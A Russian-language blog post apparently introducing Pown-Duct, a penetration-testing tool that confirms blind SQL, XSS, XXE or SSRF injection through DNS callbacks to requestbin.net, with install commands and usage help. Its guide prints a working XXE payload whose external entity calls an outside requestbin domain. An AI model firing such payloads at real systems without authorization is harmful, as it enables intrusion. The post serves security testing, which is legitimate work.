🏋️♂️ Pown-Duct – инструмент для обнаружения слепых инъекционных атак |

🏋️♂️ Pown-Duct – инструмент для обнаружения слепых инъекционных атак

Обзоры

Основной инструмент для обнаружения атак с использованием слепых инъекций с использованием каналов DNS.

Этот инструмент является частью инициативы с открытым исходным кодом secapps.com.

  ___ ___ ___   _   ___ ___  ___
 / __| __/ __| /_\ | _ \ _ \/ __|
 \__ \ _| (__ / _ \|  _/  _/\__ \
 |___/___\___/_/ \_\_| |_|  |___/
  https://secapps.com

Примечание: этот инструмент использует сервис http://requestbin.net. В будущих версиях будет использоваться выделенная, специально созданная инфраструктура.

Быстрый старт

Этот инструмент предназначен для использования в составе Pown.js, но его можно вызывать отдельно как независимый инструмент.

Сначала установите Pown как обычно:

$ npm install -g pown@latest

Вызывать напрямую из Pown:

$ pown duct

В противном случае установите этот модуль локально из корня вашего проекта:

$ npm install @pown/duct --save

После этого вызовите pown cli:

$ ./node_modules/.bin/pown-cli duct

Вы также можете использовать глобальный pown для локального вызова инструмента:

$ POWN_ROOT=. pown duct

Использование

pown duct <command>

Side-channel attack enabler

Commands:
  pown duct dns  DNS ducting

Options:
  --version  Show version number  [boolean]
  --help     Show help  [boolean]

pown duct dns

pown duct dns

DNS ducting

Options:
  --version  Show version number  [boolean]
  --help     Show help  [boolean]
  --channel  Restore channel  [string]
  --output   Output format  [string] [choices: "string", "hexdump", "json"] [default: "string"]

Руководство

Есть случаи, когда нам необходимо выполнить атаку, такую как внедрение SQL, XSS, XXE или SSRF, но целевое приложение не дает никаких указаний на то, что оно уязвимо.

Один из способов убедиться в наличии уязвимости – попытаться внедрить допустимый вектор атаки, который заставляет DNS-распознаватель запрашивать контролируемый домен.

Если разрешение прошло успешно, атака будет считаться успешной.

ПРИМЕЧАНИЕ. Возможно, вы знакомы с Burp Collaborator, который предоставляет аналогичные услуги для клиентов.

Во-первых, нам нужно одноразовое имя DNS, чтобы решить:

$ pown duct dns

Используя предоставленный DNS, составьте свою полезную нагрузку.

Например, следующее может вызвать разрешение DNS, если присутствует уязвимость XXE.

<!DOCTYPE foo [
<!ELEMENT foo ANY>
<!ENTITY bar SYSTEM "http://showmethemoney.bfa8b8d3c25f09d5429f.d.requestbin.net">
]>
<foo>
&bar;
</foo>

Если атака прошла успешно, мы получим сообщение в терминале.

Скачать Pown-Duct

¯\_(ツ)_/¯

Примечание: Информация для исследования, обучения или проведения аудита. Применение в корыстных целях карается законодательством РФ.

Пожалуйста, не спамьте и никого не оскорбляйте. Это поле для комментариев, а не спамбокс. Рекламные ссылки не индексируются!
Добавить комментарий